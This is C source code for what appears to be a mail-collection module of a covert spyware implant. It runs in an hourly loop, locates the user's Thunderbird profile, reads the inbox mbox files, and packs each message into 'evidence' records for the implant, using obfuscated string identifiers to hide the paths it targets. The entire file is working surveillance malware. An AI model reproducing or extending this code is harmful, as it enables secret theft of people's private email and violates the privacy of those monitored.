#include <unistd.h>
#include <string.h>
#include <glob.h>
#include <linux/limits.h>
#include <openssl/bio.h>

#include "module.h"
#include "evidencemanager.h"
#include "me.h"
#include "so.h"

#define FOLDER_INBOX 0x10
#define FOLDER_SENT 0x100

#define PROGRAM_THUNDERBIRD 0x03

struct additional {
   unsigned int version;
   unsigned int flags;
   unsigned int size;
   unsigned int ltime;
   unsigned int htime;
   unsigned int program;
} __attribute__((packed));

static int thunderbird_getprofiledir(char *profile, int size);
static int thunderbird_getmessages(void);
static int thunderbird_getmail(char *mbox, int folder);
static int getmail(BIO *bio_data, int folder, int program);

void *module_messages_start(void *args)
{
   FILE *fp = NULL;
   time_t begin, end;
   char line[256];
   
   debugme("Running module MESSAGES\n");

   while(MODULE_MESSAGES.status != MODULE_STOPPING) {
      if(MODULE_MESSAGES.status == MODULE_STARTING) MODULE_MESSAGES.status = MODULE_STARTED;

      do {
         begin = 0;
         if(!(fp = fopen(so151, "r"))) break;
         if(!fgets(line, sizeof(line), fp)) break;
         begin = atoi(line);
         if(MODULE_MESSAGES_P->from < begin) MODULE_MESSAGES_P->from = begin;
      } while(0);
      if(fp) fclose(fp);

      do {
         end = time(NULL);
         if(!(fp = fopen(so151, "w"))) break;
         fprintf(fp, "%lu", end);
      } while(0);
      if(fp) fclose(fp);

      thunderbird_getmessages();

      sleep(3600);
   }

   MODULE_MESSAGES.status = MODULE_STOPPED;

   return NULL;
}

static int thunderbird_getprofiledir(char *profile, int size)
{
   char file[PATH_MAX], line[512], *ptr = NULL;
   int ret = -1, isrel = 1;
   FILE *fp = NULL;

   do {
      if(snprintf(file, sizeof(file), so153, getenv(so154)) >= sizeof(file)) break;
      if(!(fp = fopen(file, "r"))) break;
      while(fgets(line, sizeof(line), fp)) {
         if(!strncmp(line, so155, strlen(so155))) isrel = atoi(line + strlen(so155));
         if(!strncmp(line, so158, strlen(so158))) {
            ptr = line + strlen(so158);
            while(ptr[strlen(ptr) - 1] == '\n') ptr[strlen(ptr) - 1] = '\0';
            if(isrel) {
               if(snprintf(profile, size, so161, getenv(so154), ptr) >= size) break;
            } else {
               if(snprintf(profile, size, so163, ptr) >= size) break;
            }
            ret = 0;
            break;
         }
      }
   } while(0);
   if(fp) fclose(fp);

   return ret;
}

static int thunderbird_getmessages(void)
{
   char profiledir[PATH_MAX], file[PATH_MAX];
   glob_t mbox;
   int i;

   do {
      memset(&mbox, 0, sizeof(mbox));
      if(thunderbird_getprofiledir(profiledir, sizeof(profiledir))) break;
      if(snprintf(file, sizeof(file), so164, profiledir) >= sizeof(file)) break;
      if(glob(file, GLOB_MARK|GLOB_NOSORT|GLOB_BRACE, NULL, &mbox)) break;
      for(i = 0; i < mbox.gl_pathc; i++) thunderbird_getmail(mbox.gl_pathv[i], FOLDER_INBOX);
   } while(0);
   globfree(&mbox);

#if 0
   do {
      memset(&mbox, 0, sizeof(mbox));
      if(thunderbird_getprofiledir(profiledir, sizeof(profiledir))) break;
      if(snprintf(file, sizeof(file), so165, profiledir) >= sizeof(file)) break;
      if(glob(file, GLOB_MARK|GLOB_NOSORT|GLOB_BRACE, NULL, &mbox)) break;
      for(i = 0; i < mbox.gl_pathc; i++) thunderbird_getmail(mbox.gl_pathv[i], FOLDER_SENT);
   } while(0);
   globfree(&mbox);
#endif

   return 0;
}

static int thunderbird_getmail(char *mbox, int folder)
{
   FILE *fp = NULL;
   char line[4096];
   BIO *bio_data = NULL;
   time_t date = 0;

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;
      if(!(fp = fopen(mbox, "r"))) break;
      if(!fgets(line, sizeof(line), fp) || strncmp(line, "From ", strlen("From "))) break;

      while(!feof(fp)) {
         if(!fgets(line, sizeof(line), fp)) break;
         if(strncmp(line, "From ", strlen("From "))) {
            do {
               if(!strncmp(line, "X-Mozilla-Status: ", strlen("X-Mozilla-Status: "))) break;
               if(!strncmp(line, "X-Mozilla-Status2: ", strlen("X-Mozilla-Status2: "))) break;
               /* TODO fare il parsing della data */
               /* TODO XXX fare il dequoting del From */
               BIO_write(bio_data, line, strlen(line));
            } while(0);
            if(!feof(fp)) continue;
         }
         do {
            if(date && (MODULE_MESSAGES_P->from != ((time_t) -1)) && (date < MODULE_MESSAGES_P->from)) break;
            if(date && (MODULE_MESSAGES_P->to != ((time_t) -1)) && (date > MODULE_MESSAGES_P->to)) break;
            getmail(bio_data, folder, PROGRAM_THUNDERBIRD);
         } while(0);
         BIO_reset(bio_data);
      }
   } while(0);
   if(fp) fclose(fp);
   if(bio_data) BIO_free(bio_data);

   return 0;
}

static int getmail(BIO *bio_data, int folder, int program)
{
   BIO *bio_additional = NULL;
   int additionallen, datalen;
   char *additionalptr, *dataptr;
   struct additional a;

   do {
      if(!(bio_additional = BIO_new(BIO_s_mem()))) break;

      if(!(datalen = BIO_get_mem_data(bio_data, &dataptr))) { debugme("len %d\n", datalen); break; }

      a.version = 2012030601;
      a.flags = folder;
      a.size = datalen;
      a.ltime = 0;
      a.htime = 0;
      a.program = program;

      if(BIO_write(bio_additional, &a, sizeof(a)) != sizeof(a)) break;

      BIO_flush(bio_additional);
      BIO_flush(bio_data);

      additionallen = BIO_get_mem_data(bio_additional, &additionalptr);
      datalen = BIO_get_mem_data(bio_data, &dataptr);

      evidence_write(EVIDENCE_TYPE_MAIL, additionalptr, additionallen, dataptr, datalen);
   } while(0);
   if(bio_additional) BIO_free(bio_additional);

   return 0;
}
